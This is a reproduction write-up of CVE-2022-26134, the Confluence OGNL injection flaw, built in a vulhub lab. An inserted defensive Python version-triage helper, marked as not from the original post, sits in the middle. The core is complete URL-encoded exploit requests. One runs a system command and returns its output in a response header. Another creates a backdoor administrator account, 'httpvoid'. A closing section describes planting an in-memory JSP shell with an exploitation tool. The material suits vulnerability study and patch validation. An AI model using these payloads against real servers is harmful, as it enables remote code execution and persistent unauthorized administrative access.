CVE-2022-26134: Confluence OGNL Expression Injection Command Execution Vulnerability Reproduction





    Vulnerability overview

    Vulnerability type

    Command execution

    Affected versions

    Confluence Server and Data Center >= 1.3.0
    Confluence Server and Data Center < 7.4.17
    Confluence Server and Data Center < 7.13.7
    Confluence Server and Data Center < 7.14.3
    Confluence Server and Data Center < 7.15.2
    Confluence Server and Data Center < 7.16.4
    Confluence Server and Data Center < 7.17.4
    Confluence Server and Data Center < 7.18.1
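Added example (not from the original post): a Python helper that encodes the affected-version list above so a defender can triage an inventory of Confluence instances. It assumes plain x.y.z version strings, reads each "< x.y.z" entry as the first fixed release of the x.y branch, treats branches between 1.3.0 and 7.18 that have no listed fix as fully affected, and treats anything newer than 7.18.1 as fixed; the last two rules are this example's assumptions, not statements from the post.

```python
"""Triage Confluence Server / Data Center versions against the
CVE-2022-26134 affected-version list given in the write-up."""

# First fixed release per major.minor branch, taken from the list above.
FIXED_BY_BRANCH = {
    (7, 4): (7, 4, 17),
    (7, 13): (7, 13, 7),
    (7, 14): (7, 14, 3),
    (7, 15): (7, 15, 2),
    (7, 16): (7, 16, 4),
    (7, 17): (7, 17, 4),
    (7, 18): (7, 18, 1),
}
FIRST_AFFECTED = (1, 3, 0)           # ">= 1.3.0" from the list
LATEST_FIX = max(FIXED_BY_BRANCH.values())  # (7, 18, 1)


def parse_version(text):
    """Turn '7.13.6' (optionally '7.13.6-something') into a 3-tuple of ints."""
    core = text.strip().split("-")[0]
    parts = [int(p) for p in core.split(".")]
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts[:3])


def is_affected(text):
    """True when the version falls inside the affected ranges."""
    v = parse_version(text)
    if v < FIRST_AFFECTED:
        return False
    # Assumption: releases newer than the newest listed fix are patched.
    if v > LATEST_FIX:
        return False
    fix = FIXED_BY_BRANCH.get(v[:2])
    if fix is None:
        # Assumption: a branch with no listed fix (e.g. 7.12.x) is affected.
        return True
    return v < fix


def triage(versions):
    """Map each version string to 'affected' or 'fixed' for reporting."""
    return {v: ("affected" if is_affected(v) else "fixed") for v in versions}


if __name__ == "__main__":
    # Constructed sample inventory, including the vulhub target version.
    for ver, state in triage(["7.13.6", "7.13.7", "7.4.17", "7.12.3", "1.2.9"]).items():
        print(f"{ver:>8}: {state}")
```

The vulhub image used in this write-up (7.13.6) is one patch release below the 7.13.7 fix, which is why it is reported as affected.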

    Reproduction

    Environment

    vulhub, Confluence Server 7.13.6

    Reproduction steps

    Download vulhub and build the environment

    docker-compose up -d

    Apply for a license

    Visit port 8090 on the local machine and click to apply for a license.

    "Data Center" is checked by default.

    After the redirect, keep the default selection.

    After filling in the form:

    Select the JDBC URL connection here; the host is db, and the username and password are both postgres.

    Initialization

    Two options appear here: 1. set the administrator account password; 2. connect to Jira.

    Next

    Initialize a space

    Reproducing the POC

    RCE

    The POC is as follows:

    GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1
    Host: 192.168.0.104:8090
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Connection: close
    Content-Length: 2

    Add an account

    /%24%7B%23this.getUserAccessor%28%29.addUser%28%27httpvoid%27%2c%27pwn@1234%27%2c%27pwn@httpvoid.com%27%2c%27HttpVoid%27%2c@com.atlassian.confluence.util.GeneralUtil@splitCommaDelimitedString%28%22confluence-administrators,confluence-users%22%29%29%7D/

    Request:

    GET /%24%7B%23this.getUserAccessor%28%29.addUser%28%27httpvoid%27%2c%27pwn@1234%27%2c%27pwn@httpvoid.com%27%2c%27HttpVoid%27%2c@com.atlassian.confluence.util.GeneralUtil@splitCommaDelimitedString%28%22confluence-administrators,confluence-users%22%29%29%7D/ HTTP/1.1
    Host: 192.168.0.104:8090
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Connection: close
    Content-Length: 2

    Current user

    After executing the above POC, log out of the current user.

    The added account name and password:

    httpvoid

    pwn@1234

    Weaponization

    In-memory shell

    Use the woodpecker tool together with the weaponization plugin written by 深蓝.

    Scan and probe, then check "send to poc".

    For post-exploitation, check "send to Exploit", select CVE-2022-26134, and run exploit.

    Connect to the shell (jsp type).

    Add an account

    Original article: https://blog.csdn.net/qq_38376348/article/details/125459671